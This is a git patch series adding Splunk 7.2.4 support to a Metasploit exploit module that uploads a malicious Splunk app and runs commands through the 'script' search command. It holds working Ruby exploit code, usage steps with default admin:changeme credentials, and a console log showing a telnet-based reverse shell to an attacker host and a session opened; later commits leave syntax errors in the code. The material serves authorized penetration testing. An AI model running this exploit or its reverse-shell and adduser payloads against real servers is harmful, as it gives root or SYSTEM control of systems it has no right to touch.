From 4af2b87a790878bad7c9763ac33989a094767d2c Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Sun, 17 Mar 2019 22:23:11 +0100 Subject: [PATCH 01/42] Create splunk_upload_app_exec.md --- .../multi/http/splunk_upload_app_exec.md | 83 +++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/splunk_upload_app_exec.md diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md new file mode 100644 index 000000000000..d9f7174c9ef5 --- /dev/null +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -0,0 +1,83 @@ +## Vulnerable Application + +This module exploits a feature of Splunk whereby a custom application can be +uploaded through the web based interface. Through the \'script\' search command a +user can call commands defined in their custom application which includes arbitrary +perl or python code. To abuse this behavior, a valid Splunk user with the admin +role is required. By default, this module uses the credential of "admin:changeme", +the default Administrator credential for Splunk. Note that the Splunk web interface +runs as SYSTEM on Windows, or as root on Linux by default. This module has been +tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. +Version 7.2.4 has been tested successfully against OSX as well. + +## Verification Steps + + 1. Start msfconsole + 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` + 3. Set required variables (you will need admin credentials) + 4. Do: ```SET TARGET 1``` + 5. Do: ```SET RHOST 192.168.1.1``` + 6. Do: ```SET USERNAME admin``` + 7. Do: ```SET PASSWORD changeme``` + 8. You should get a reverse shell on port 4444 via the predefined handler. + +## External Demo +[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
+[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+ +## Options + + **EnableOverwrite**
+ Overwrites an app of the same name. Needed if you change the app code in the tgz. + Is not enabled by default. + +## Scenarios + +### Testing against 7.2.4 running on OSX + + Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. + + ``` +msf5 exploit(multi/http/splunk_upload_app_exec) > +msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 +RHOST => 172.16.165.1 +msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk +password => splunksplunk +msf5 exploit(multi/http/splunk_upload_app_exec) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Automatic + 1 Splunk >= 7.2.4 / Linux + 2 Splunk >= 7.2.4 / Windows + 3 Splunk >= 7.2.4 / OSX + 4 Splunk >= 5.0.1 / Linux + 5 Splunk >= 5.0.1 / Windows + + +msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 +target => 3 +msf5 exploit(multi/http/splunk_upload_app_exec) > exploit + +[*] Started reverse TCP double handler on 172.16.165.206:4444 +[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' +[*] Authenticating... +[*] Fetching state token from /en-US/manager/appinstall/_upload +[*] Uploading file upload_app_exec.tgz +[+] upload_app_exec successfully uploaded +[*] Invoking script command +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 8kNbt70jYB3aJKPm; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n" +[*] Matching... +[*] B is input... +[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 + ``` From 7a31fc2d17ab4fd1f54af95dfec65a30fcdd561f Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 09:12:00 +0100 Subject: [PATCH 02/42] added splunk 7.2.4 support --- .../multi/http/splunk_upload_app_exec.rb | 214 +++++++++++++++--- 1 file changed, 184 insertions(+), 30 deletions(-) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index b65740d4c0e1..4454cf2c9ec4 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -20,13 +20,15 @@ def initialize(info = {}) role is required. By default, this module uses the credential of "admin:changeme", the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has been - tested successfully against Splunk 5.0, 6.1, and 6.1.1.', + tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. + Version 7.2.4 has been tested successfully against OSX as well', 'Author' => [ - "marcwickenden", # discovery and metasploit module - "sinn3r", # metasploit module - "juan vazquez", # metasploit module - "Gary Blosser" # metasploit module updates for Splunk 6.1 + "marcwickenden", # discovery and metasploit module + "sinn3r", # metasploit module + "juan vazquez", # metasploit module + "Gary Blosser", # metasploit module updates for Splunk 6.1 + "Matteo Malvica" # metasploit module updates for Splunk 7.2.4 ], 'License' => MSF_LICENSE, 'References' => @@ -40,9 +42,27 @@ def initialize(info = {}) 'Space' => 1024, 'DisableNops' => true }, - 'Platform' => %w(linux unix win), + 'Platform' => %w(linux unix win osx), 'Targets' => [ + [ 'Splunk >= 7.2.4 / Linux', + { + 'Arch' => ARCH_CMD, + 'Platform' => %w(linux unix) + } + ], + [ 'Splunk >= 7.2.4 / Windows', + { + 'Arch' => ARCH_CMD, + 'Platform' => 'win' + } + ], + [ 'Splunk >= 7.2.4 / OSX', + { + 'Arch' => ARCH_CMD, + 'Platform' => %w(linux unix) + } + ], [ 'Splunk >= 5.0.1 / Linux', { 'Arch' => ARCH_CMD, @@ -96,36 +116,55 @@ def exploit # set up some variables for later use @auth_cookies = '' @csrf_form_key = '' + @state_token = '' + @splunkweb_csrf_token_8000_id = '' @csrf_form_port = "splunkweb_csrf_token_#{rport}" # Default to using rport, corrected during tokenization for v6 below. + @ver7 = false # splunk version 7 boolean + app_name = 'upload_app_exec' p = payload.encoded print_status("Using command: #{p}") cmd = Rex::Text.encode_base64(p) - # log in to Splunk (if required) - do_login + # check if the target version is 7.2.4 + if target.name.include? "7.2.4" + @ver7 = true + end + + do_login # fetch the csrf token for use in the upload next - do_get_csrf('/en-US/manager/launcher/apps/local') + if @ver7 == true + do_get_state_token('/en-US/manager/appinstall/_upload') + else + do_get_csrf('/en-US/manager/launcher/apps/local') + end unless disable_upload # upload the arbitrary command execution Splunk app tgz - do_upload_app(app_name, file_name) + if @ver7 == true + do_upload_app_7(app_name, file_name) + else + do_upload_app(app_name, file_name) + end end - # get the next csrf token from our new app - do_get_csrf("/en-US/app/#{app_name}/flashtimeline") - + if @ver7 == false + # get the next csrf token from our new app + do_get_csrf("/en-US/app/#{app_name}/flashtimeline") + end + # call our command execution function with the Splunk 'script' command print_status("Invoking script command") - res = send_request_cgi( - 'uri' => '/en-US/api/search/jobs', + if @ver7 == true + res = send_request_cgi( + 'uri' => '/en-US/splunkd/__raw/servicesNS/admin/search/search/jobs', 'method' => 'POST', - 'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified) + 'cookie' => "#{@auth_cookies};", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified) 'headers' => { 'X-Requested-With' => 'XMLHttpRequest', - 'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified) + 'X-Splunk-Form-Key' => @splunkweb_csrf_token_8000_id # Version 6 ignores extra headers (verified) }, 'vars_post' => { @@ -143,11 +182,44 @@ def exploit 'timeFormat' => "%s.%Q" } ) + else + res = send_request_cgi( + 'uri' => '/en-US/api/search/jobs', + 'method' => 'POST', + 'cookie' => "#{@auth_cookies}; #{@csrf_form_port}=#{@csrf_form_key}", # Version 6 uses cookies and not just headers, extra cookies should be ignored by Splunk 5 (unverified) + 'headers' => + { + 'X-Requested-With' => 'XMLHttpRequest', + 'X-Splunk-Form-Key' => @csrf_form_key # Version 6 ignores extra headers (verified) + }, + 'vars_post' => + { + 'search' => "search * | script msf_exec #{cmd}", # msf_exec defined in default/commands.conf + 'status_buckets' => "300", + 'namespace' => "#{app_name}", + 'ui_dispatch_app' => "#{app_name}", + 'ui_dispatch_view' => "flashtimeline", + 'auto_cancel' => "100", + 'wait' => "0", + 'required_field_list' => "*", + 'adhoc_search_level' => "smart", + 'earliest_time' => "0", + 'latest_time' => "", + 'timeFormat' => "%s.%Q" + } + ) + end if return_output + if ver7 == true + res.body.match('sid.*') + job_id_blob = Regexp.last_match(0) + job_id_blob2 = job_id_blob.split('>')[1] + job_id = job_id_blob2.split('<')[0] + else res.body.match(/data":\ "([0-9.]+)"/) job_id = Regexp.last_match(1) - + end # wait a short time to let the output be produced print_status("Waiting for #{command_output_delay} seconds to retrieve command output") select(nil, nil, nil, command_output_delay) @@ -231,25 +303,48 @@ def do_login if !res fail_with(Failure::Unreachable, "No response") + elsif res.code != 200 + fail_with(Failure::Unreachable, "Authentication failed") + + elsif @ver7 == true + splunkweb_csrf_token_8000_port = '' + @splunkweb_csrf_token_8000_id = '' + splunkd_8000_port = '' + splunkd_8000_id = '' + + #puts res + res.get_cookies.split(';').each do |c| + c.split(',').each do |v| + if v.split('=')[0] =~ /splunkweb_csrf_token_8000/ + splunkweb_csrf_token_8000_port = v.split('=')[0] + @splunkweb_csrf_token_8000_id = v.split('=')[1] + elsif v.split('=')[0] =~ /splunkd_8000/ # regex as the full name is something like splunkweb_csrf_token_8000 + splunkd_8000_port = v.split('=')[0] # Accounting for tunnels where rport is not the actual server-side port + splunkd_8000_id = v.split('=')[1] + end + end + @auth_cookies = "session_id_8000=37305a4fb182fadd28a1591b64a0b22b0765159e;#{splunkweb_csrf_token_8000_port}=#{@splunkweb_csrf_token_8000_id};#{splunkd_8000_port}=#{splunkd_8000_id}; splunkweb_uid=30A93112-7681-4C0D-B1F6-17CAB1FA2735;login=true" + end + else - session_id_port = '' - session_id = '' - res.get_cookies.split(';').each do |c| - c.split(',').each do |v| - if v.split('=')[0] =~ /session_id/ - session_id_port = v.split('=')[0] - session_id = v.split('=')[1] + session_id_port = '' + session_id = '' + res.get_cookies.split(';').each do |c| + c.split(',').each do |v| + if v.split('=')[0] =~ /session_id/ + session_id_port = v.split('=')[0] + session_id = v.split('=')[1] + end end end - end - @auth_cookies = "#{session_id_port}=#{session_id}" + @auth_cookies = "#{session_id_port}=#{session_id}" end end - + def do_upload_app(app_name, file_name) archive_file_name = ::File.basename(file_name) print_status("Uploading file #{archive_file_name}") - file_data = ::File.open(file_name, "rb") { |f| f.read } + file_data = ::File.read(file_name) boundary = '--------------' + rand_text_alphanumeric(6) @@ -286,6 +381,48 @@ def do_upload_app(app_name, file_name) end end + # version 7.2.x only + def do_upload_app_7(app_name, file_name) + archive_file_name = ::File.basename(file_name) + print_status("Uploading file #{archive_file_name}") + file_data = ::File.read(file_name) + + boundary = '---------------------------' + rand_text_numeric(29) + + data = "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"state\"\r\n" + data << "\r\n#{@state_token}\r\n" + + data << "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"splunk_form_key\"\r\n" + data << "\r\n#{@splunkweb_csrf_token_8000_id}\r\n" + + data << "--#{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"appfile\"; filename=\"#{archive_file_name}\"\r\n" + data << "Content-Type: application/x-compressed-tar\r\n\r\n" + data << file_data + data << "\r\n--#{boundary}\r\n" + + data << "Content-Disposition: form-data; name=\"force\"\r\n\r\n" + data << "1" + data << "\r\n--#{boundary}--\r\n" + + res = send_request_cgi( + { + 'uri' => '/en-US/manager/appinstall/_upload', + 'method' => 'POST', + 'cookie' => "#{@auth_cookies};", + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => data + }, 30) + + if res && (res.code == 303 || (res.code == 200 && res.body !~ /There was an error processing the upload/)) + print_good("#{app_name} successfully uploaded") + else + fail_with(Failure::Unknown, "Error uploading") + end + end + def do_get_csrf(uri) print_status("Fetching csrf token from #{uri}") res = send_request_cgi( @@ -306,10 +443,27 @@ def do_get_csrf(uri) end end end - fail_with(Failure::Unknown, "csrf form Key not found") unless @csrf_form_key end + # version 7.2.x only + def do_get_state_token(uri) + print_status("Fetching state token from #{uri}") + res = send_request_cgi( + 'uri' => uri, + 'method' => 'GET', + 'cookie' => @auth_cookies + ) + #puts res + res.body.match('name=\"state\" value="(.*)"') # Version 5 + @state_token = Regexp.last_match(1) + + unless @state_token + fail_with(Failure::Unknown, "state token form Key not found") unless @state_token + + end + end + def fetch_job_output(job_id) # fetch the output of our job id as csv for easy parsing print_status("Fetching job_output for id #{job_id}") From c5871d8a5da9900157d6fb3012db743c8db062ee Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 09:13:01 +0100 Subject: [PATCH 03/42] adding documentation to splunk modukle --- .../multi/http/lesplunk_upload_app_exec.md | 83 +++++++++++++++++++ 1 file changed, 83 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md new file mode 100644 index 000000000000..d9f7174c9ef5 --- /dev/null +++ b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md @@ -0,0 +1,83 @@ +## Vulnerable Application + +This module exploits a feature of Splunk whereby a custom application can be +uploaded through the web based interface. Through the \'script\' search command a +user can call commands defined in their custom application which includes arbitrary +perl or python code. To abuse this behavior, a valid Splunk user with the admin +role is required. By default, this module uses the credential of "admin:changeme", +the default Administrator credential for Splunk. Note that the Splunk web interface +runs as SYSTEM on Windows, or as root on Linux by default. This module has been +tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. +Version 7.2.4 has been tested successfully against OSX as well. + +## Verification Steps + + 1. Start msfconsole + 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` + 3. Set required variables (you will need admin credentials) + 4. Do: ```SET TARGET 1``` + 5. Do: ```SET RHOST 192.168.1.1``` + 6. Do: ```SET USERNAME admin``` + 7. Do: ```SET PASSWORD changeme``` + 8. You should get a reverse shell on port 4444 via the predefined handler. + +## External Demo +[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
+[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+ +## Options + + **EnableOverwrite**
+ Overwrites an app of the same name. Needed if you change the app code in the tgz. + Is not enabled by default. + +## Scenarios + +### Testing against 7.2.4 running on OSX + + Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. + + ``` +msf5 exploit(multi/http/splunk_upload_app_exec) > +msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 +RHOST => 172.16.165.1 +msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk +password => splunksplunk +msf5 exploit(multi/http/splunk_upload_app_exec) > show targets + +Exploit targets: + + Id Name + -- ---- + 0 Automatic + 1 Splunk >= 7.2.4 / Linux + 2 Splunk >= 7.2.4 / Windows + 3 Splunk >= 7.2.4 / OSX + 4 Splunk >= 5.0.1 / Linux + 5 Splunk >= 5.0.1 / Windows + + +msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 +target => 3 +msf5 exploit(multi/http/splunk_upload_app_exec) > exploit + +[*] Started reverse TCP double handler on 172.16.165.206:4444 +[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' +[*] Authenticating... +[*] Fetching state token from /en-US/manager/appinstall/_upload +[*] Uploading file upload_app_exec.tgz +[+] upload_app_exec successfully uploaded +[*] Invoking script command +[*] Accepted the first client connection... +[*] Accepted the second client connection... +[*] Command: echo 8kNbt70jYB3aJKPm; +[*] Writing to socket A +[*] Writing to socket B +[*] Reading from sockets... +[*] Reading from socket A +[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n" +[*] Matching... +[*] B is input... +[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 + ``` From c7d2b6c18efb496bf43cbce343ebc15e3984f80f Mon Sep 17 00:00:00 2001 From: bcoles Date: Mon, 18 Mar 2019 10:30:54 +0100 Subject: [PATCH 04/42] Update documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md Co-Authored-By: avanzo --- .../modules/exploit/multi/http/lesplunk_upload_app_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md index d9f7174c9ef5..69872756292c 100644 --- a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md @@ -28,7 +28,7 @@ Version 7.2.4 has been tested successfully against OSX as well. ## Options - **EnableOverwrite**
+ **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Is not enabled by default. From 029d42a649a909ca9b8bef046d084a5d39f4b7a0 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 10:35:00 +0100 Subject: [PATCH 05/42] included link list --- .../modules/exploit/multi/http/lesplunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md index 69872756292c..b1e11a1a0940 100644 --- a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md @@ -22,9 +22,9 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo -[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
-[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
-[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) +* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html) +* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script) ## Options From ba60536585cbd4941e310cf5c141443d34d6b5f8 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 12:15:16 +0100 Subject: [PATCH 06/42] duplicate --- .../multi/http/lesplunk_upload_app_exec.md | 83 ------------------- 1 file changed, 83 deletions(-) delete mode 100644 documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md diff --git a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md deleted file mode 100644 index b1e11a1a0940..000000000000 --- a/documentation/modules/exploit/multi/http/lesplunk_upload_app_exec.md +++ /dev/null @@ -1,83 +0,0 @@ -## Vulnerable Application - -This module exploits a feature of Splunk whereby a custom application can be -uploaded through the web based interface. Through the \'script\' search command a -user can call commands defined in their custom application which includes arbitrary -perl or python code. To abuse this behavior, a valid Splunk user with the admin -role is required. By default, this module uses the credential of "admin:changeme", -the default Administrator credential for Splunk. Note that the Splunk web interface -runs as SYSTEM on Windows, or as root on Linux by default. This module has been -tested successfully against Splunk 5.0, 6.1, 6.1.1 and 7.2.4. -Version 7.2.4 has been tested successfully against OSX as well. - -## Verification Steps - - 1. Start msfconsole - 2. Do: ```use exploit/multi/http/splunk_upload_app_exec``` - 3. Set required variables (you will need admin credentials) - 4. Do: ```SET TARGET 1``` - 5. Do: ```SET RHOST 192.168.1.1``` - 6. Do: ```SET USERNAME admin``` - 7. Do: ```SET PASSWORD changeme``` - 8. You should get a reverse shell on port 4444 via the predefined handler. - -## External Demo -* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html) -* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html) -* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script) - -## Options - - **EnableOverwrite** - Overwrites an app of the same name. Needed if you change the app code in the tgz. - Is not enabled by default. - -## Scenarios - -### Testing against 7.2.4 running on OSX - - Given admin credentials we can upload the custom app to SPLUNK, which will provide us with a reverse shell, triggered by the 'search' field API. - - ``` -msf5 exploit(multi/http/splunk_upload_app_exec) > -msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 -RHOST => 172.16.165.1 -msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk -password => splunksplunk -msf5 exploit(multi/http/splunk_upload_app_exec) > show targets - -Exploit targets: - - Id Name - -- ---- - 0 Automatic - 1 Splunk >= 7.2.4 / Linux - 2 Splunk >= 7.2.4 / Windows - 3 Splunk >= 7.2.4 / OSX - 4 Splunk >= 5.0.1 / Linux - 5 Splunk >= 5.0.1 / Windows - - -msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 -target => 3 -msf5 exploit(multi/http/splunk_upload_app_exec) > exploit - -[*] Started reverse TCP double handler on 172.16.165.206:4444 -[*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' -[*] Authenticating... -[*] Fetching state token from /en-US/manager/appinstall/_upload -[*] Uploading file upload_app_exec.tgz -[+] upload_app_exec successfully uploaded -[*] Invoking script command -[*] Accepted the first client connection... -[*] Accepted the second client connection... -[*] Command: echo 8kNbt70jYB3aJKPm; -[*] Writing to socket A -[*] Writing to socket B -[*] Reading from sockets... -[*] Reading from socket A -[*] A: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\n8kNbt70jYB3aJKPm\r\n" -[*] Matching... -[*] B is input... -[*] Command shell session 1 opened (172.16.165.206:4444 -> 172.16.165.1:51512) at 2019-03-17 22:12:33 +0100 - ``` From 8ee308da8aef9666de3754fb4410815f42762b86 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 12:15:48 +0100 Subject: [PATCH 07/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index d9f7174c9ef5..5cf365d7a9cd 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -22,13 +22,13 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo -[First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
-[Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
-[SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
+* [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
+* [Metasploit module how-to](http://blog.7elements.co.uk/2012/11/abusing-splunk-with-metasploit.html)
+* [SPLUNK API](http://docs.splunk.com/Documentation/Splunk/latest/SearchReference/Script)
## Options - **EnableOverwrite**
+ **EnableOverwrite** Overwrites an app of the same name. Needed if you change the app code in the tgz. Is not enabled by default. From 2605611e563bbe2aa43e560ca7769baa3e4d460c Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:37:05 +0100 Subject: [PATCH 08/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 5cf365d7a9cd..b8c51e459863 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -19,7 +19,14 @@ Version 7.2.4 has been tested successfully against OSX as well. 5. Do: ```SET RHOST 192.168.1.1``` 6. Do: ```SET USERNAME admin``` 7. Do: ```SET PASSWORD changeme``` - 8. You should get a reverse shell on port 4444 via the predefined handler. + + 8. If targeting linux or macos set proper payload + ```SET TARGET [1|3]``` + ```set payload cmd/unix/reverse_python``` + If targeting windows set proper payload + ```SET TARGET 2``` + set payload cmd/windows/adduser + 9. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo * [First PoC](http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html)
From 70a705a30386b2d2dbe2d3d1926fb58c05136583 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:41:46 +0100 Subject: [PATCH 09/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b8c51e459863..b2ddf9dc45b1 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -21,10 +21,10 @@ Version 7.2.4 has been tested successfully against OSX as well. 7. Do: ```SET PASSWORD changeme``` 8. If targeting linux or macos set proper payload - ```SET TARGET [1|3]``` - ```set payload cmd/unix/reverse_python``` + * ```SET TARGET [1|3]``` + *```set payload cmd/unix/reverse_python``` If targeting windows set proper payload - ```SET TARGET 2``` + * ```SET TARGET 2``` set payload cmd/windows/adduser 9. You should get a reverse shell on port 4444 via the predefined handler. From 9e2100ca22a93b195602c90c83eba7822dc79e7d Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:42:33 +0100 Subject: [PATCH 10/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index b2ddf9dc45b1..2330afe417fd 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -22,10 +22,10 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. If targeting linux or macos set proper payload * ```SET TARGET [1|3]``` - *```set payload cmd/unix/reverse_python``` + * ```set payload cmd/unix/reverse_python``` If targeting windows set proper payload * ```SET TARGET 2``` - set payload cmd/windows/adduser + * ```set payload cmd/windows/adduser``` 9. You should get a reverse shell on port 4444 via the predefined handler. ## External Demo From f6e9410d87804bd9685e453093344e3edffc1ba9 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 14:43:47 +0100 Subject: [PATCH 11/42] Update splunk_upload_app_exec.md --- .../modules/exploit/multi/http/splunk_upload_app_exec.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 2330afe417fd..106147dc7246 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md +++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -23,7 +23,8 @@ Version 7.2.4 has been tested successfully against OSX as well. 8. If targeting linux or macos set proper payload * ```SET TARGET [1|3]``` * ```set payload cmd/unix/reverse_python``` - If targeting windows set proper payload + + If targeting windows set proper payload * ```SET TARGET 2``` * ```set payload cmd/windows/adduser``` 9. You should get a reverse shell on port 4444 via the predefined handler. From 2f1ee95073312fb5b3a0e8171f29d7ac4df2b118 Mon Sep 17 00:00:00 2001 From: Matteo Malvica Date: Mon, 18 Mar 2019 15:11:04 +0100 Subject: [PATCH 12/42] Update splunk_upload_app_exec.rb --- modules/exploits/multi/http/splunk_upload_app_exec.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/multi/http/splunk_upload_app_exec.rb b/modules/exploits/multi/http/splunk_upload_app_exec.rb index 4454cf2c9ec4..2ae0a186bdb3 100644 --- a/modules/exploits/multi/http/splunk_upload_app_exec.rb +++ b/modules/exploits/multi/http/splunk_upload_app_exec.rb @@ -49,18 +49,21 @@ def initialize(info = {}) { 'Arch' => ARCH_CMD, 'Platform' => %w(linux unix) + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 7.2.4 / Windows', { 'Arch' => ARCH_CMD, 'Platform' => 'win' + 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'} } ], [ 'Splunk >= 7.2.4 / OSX', { 'Arch' => ARCH_CMD, 'Platform' => %w(linux unix) + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_python'} } ], [ 'Splunk >= 5.0.1 / Linux', From 